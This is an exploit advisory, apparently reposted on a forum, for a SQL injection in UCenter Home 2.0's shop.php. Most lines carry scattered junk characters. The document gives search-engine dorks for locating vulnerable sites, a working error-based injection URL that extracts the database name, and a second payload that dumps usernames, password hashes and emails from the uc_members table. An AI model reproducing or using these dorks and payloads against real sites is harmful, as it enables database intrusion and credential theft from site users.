: [4 y; t% H9 ^5 w
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ 4 ]) V |1 R. j. d2 M L
& ?% K5 v$ y& N0 n" ]7 t% a
& u$ [1 B4 n q# x
& l; @# r' u$ H*/ Author : KnocKout U+ H5 ` u$ A( S3 M
7 }; @. r0 G& `5 e*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
' | e$ B8 z/ p. B5 H
; r: p3 p( p( q3 e, k2 j$ d*/ Contact: knockoutr@msn.com , w7 k6 W- n- |! P
L O1 Y& @; ~/ P( z' n9 {
*/ Cyber-Warrior.org/CWKnocKout % B2 x0 Z! a! F H9 Y* p
0 w8 K- O0 ^; M+ `: r0 h0 K0 N
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
% v1 v6 }- e+ u6 a/ _) o5 `* @# a: E5 D% L, A1 K
Script : UCenter Home
$ Y5 Z0 N a6 @# y3 K0 \+ B1 X g/ _0 r8 c/ L% H; f+ v
Version : 2.0
# c- a( N3 L0 ^1 A- Q/ A# j! N
+ Z) d9 u4 X1 k3 C( }& oScript HomePage : http://u.discuz.net/ & W# Q9 a0 N1 {5 L( l
# |' |) v1 E& K7 I4 \__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
% d) J/ K# @* I8 v7 K" o4 \
2 h, ?- n3 {; ^& J( u& Z3 s4 Y5 kDork : Powered by UCenter inurl:shop.php?ac=view
b) V6 b+ S5 n: O4 v% x. D* a
6 ?. N* q- F" \/ G! cDork 2 : inurl:shop.php?ac=view&shopid= & V' f- T5 H. I& o
2 L( Y. M4 M3 }" r9 z0 N
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
6 e1 v7 v; [- P; z) }- v# W5 D
1 |1 X, c2 W4 f0 TVuln file : Shop.php
( L6 t/ Z) E- H8 u4 n! K0 @1 [) W( ]# I G1 z
value's : (?)ac=view&shopid= 4 R& d% N9 T T) q
$ l# J' z( K. F6 D6 T, k
Vulnerable Style : SQL Injection (MySQL Error Based)
7 a2 v' i: g O& r/ a% U
9 t% C$ |$ z7 fNeed Metarials : Hex Conversion 4 g$ B& U* _" S' v# ]5 V
$ h& v8 k" `: e5 J% `' ]# q__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== - ]: V, K- g( m' B1 D3 Q2 b
, G) _- @" z2 D" ]* Y
Your Need victim Database name.
2 R* { n+ A* r/ z
, L! |* ^* Y& N# V; yfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
/ B7 k; B8 ]4 G2 [ m7 F
$ Z1 R' ^4 C" j% \..
0 [ I e! ~* g: m5 a! [# w! q, u9 _; N
DB : Okey.
) g# d1 e _ W" q0 s: S/ I/ B8 _ O* q
your edit DB `[TARGET DB NAME]`
x) A; o3 d* t& A% _
: q3 O4 T4 N3 \" A KExample : 'hiwir1_ucenter' 4 d+ o' o, y: Q @
" T# Y9 }; {0 m7 x5 F. R" M/ OEdit : Okey.
& u/ {* }* L# }* n; }7 f, w+ L$ T% w! y$ p$ D1 j; c- [" \& x
Your use Hex conversion. And edit Your SQL Injection Exploit.. 7 }2 D+ W: q( _( R
# Q8 Q" ~ g0 b5 E) Z: m
0 {( \2 }5 K+ }5 {' ~8 s$ P
; e% C' R! `& p! R8 p3 @# ^1 g' pExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
/ g$ h4 W- [% }# B/ B |
发表于 2013-2-27 21:31:31
收藏
支持
反对